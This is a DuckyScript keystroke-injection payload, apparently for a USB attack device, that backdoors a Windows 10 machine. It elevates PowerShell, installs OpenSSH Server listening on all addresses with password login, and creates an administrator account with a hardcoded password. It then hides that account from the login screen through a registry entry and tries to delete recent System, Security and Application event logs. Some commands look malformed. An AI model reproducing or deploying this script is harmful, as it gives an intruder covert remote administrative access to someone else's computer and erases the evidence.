REM Title: W10Admin+SSH
REM Author: Sergio Cabello
REM Target: Windows
REM Description: Crea un Usario Admin y Instala OpenSSH server y permite conexion desde cualquier IP
DELAY 5000
GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 2000
STRING Start-Process powershell -Verb RunAs
ENTER
DELAY 1250
LEFT
DELAY 1250
ENTER
DELAY 1000
STRING Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0
ENTER
DELAY 10000
STRING New-Item -Path 'C:\ProgramData\ssh' -Name 'sshd_config' -ItemType 'file' -Force
ENTER
STRING notepad C:\ProgramData\ssh\sshd_config
ENTER
DELAY 1000
STRING ListenAddress 0.0.0.0
ENTER
DELAY 500
STRING PasswordAuthentication yes
ENTER
DELAY 500
CONTROL g
DELAY 1000
ALT F4
DELAY 500
STRING Restart-Service sshd
DELAY 4000
STRING New-LocalUser -Name "Z3R0" -Password (ConvertTo-SecureString -AsPlainText "OigresZ3R0()" -Force) -AccountNeverExpires -PasswordNeverExpires
ENTER
DELAY 500
STRING Add-LocalGroupMember -Group "Administradores" -Member "Z3R0"
ENTER
DELAY 500
STRING New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" -Name "Z3R0" -Value 0 -PropertyType "DWord"
ENTER
DELAY 500
STRING Set-LocalUser -Name "Z3R0" -CannotBeDeleted:$true
ENTER
DELAY 500
STRING Get-EventLog -LogName "System" -After (Get-Date).AddMinutes(-5) | ForEach-Object { Clear-EventLog -LogName $_.Log -InstanceId $_.InstanceId }
ENTER
DELAY 500
STRING Get-EventLog -LogName Security -After (Get-Date).AddMinutes(-5) | Remove-EventLog
ENTER
DELAY 500
STRING Get-EventLog -LogName Application -After (Get-Date).AddMinutes(-5) | Remove-EventLog
ENTER
DELAY 500
STRING exit
ENTER
DELAY 500
STRING exit
ENTER
DELAY 500

